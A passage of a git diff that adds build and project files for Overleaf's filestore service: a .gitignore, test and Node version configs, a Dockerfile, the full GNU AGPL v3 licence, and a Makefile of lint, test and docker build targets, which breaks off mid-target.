+ "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/filestore/.gitignore b/services/filestore/.gitignore new file mode 100644 index 0000000..a2f4b5a --- /dev/null +++ b/services/filestore/.gitignore @@ -0,0 +1,54 @@ +compileFolder + +Compiled source # +################### +*.com +*.class +*.dll +*.exe +*.o +*.so + +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.jar +*.rar +*.tar +*.zip + +# Logs and databases # +###################### 
+*.log +*.sql +*.sqlite + +# OS generated files # +###################### +.DS_Store? +ehthumbs.db +Icon? +Thumbs.db + +/node_modules/* +data/*/* + +**/*.map +cookies.txt +uploads/* + +user_files/* +template_files/* + +**.swp + +/log.json +hash_folder + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/filestore/.mocharc.json b/services/filestore/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/filestore/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/filestore/.nvmrc b/services/filestore/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/filestore/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/filestore/.prettierignore b/services/filestore/.prettierignore new file mode 100644 index 0000000..3c3629e --- /dev/null +++ b/services/filestore/.prettierignore @@ -0,0 +1 @@ +node_modules diff --git a/services/filestore/Dockerfile b/services/filestore/Dockerfile new file mode 100644 index 0000000..8e336d4 --- /dev/null +++ b/services/filestore/Dockerfile @@ -0,0 +1,31 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/filestore +COPY services/filestore/install_deps.sh /overleaf/services/filestore/ +RUN chmod 0755 ./install_deps.sh && ./install_deps.sh + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/filestore/package.json /overleaf/services/filestore/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/filestore/ /overleaf/services/filestore/ + +FROM app +RUN mkdir -p uploads user_files template_files \ +&& chown node:node uploads user_files template_files +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/filestore/LICENSE b/services/filestore/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/services/filestore/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. 
Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. 
+ + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. 
You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. 
+ + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. 
In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. 
+ + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. 
If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). 
To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. 
+ + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. 
+ + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/filestore/Makefile b/services/filestore/Makefile new file mode 100644 index 0000000..cc17245 --- /dev/null +++ b/services/filestore/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. 
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = filestore +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! 
echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from 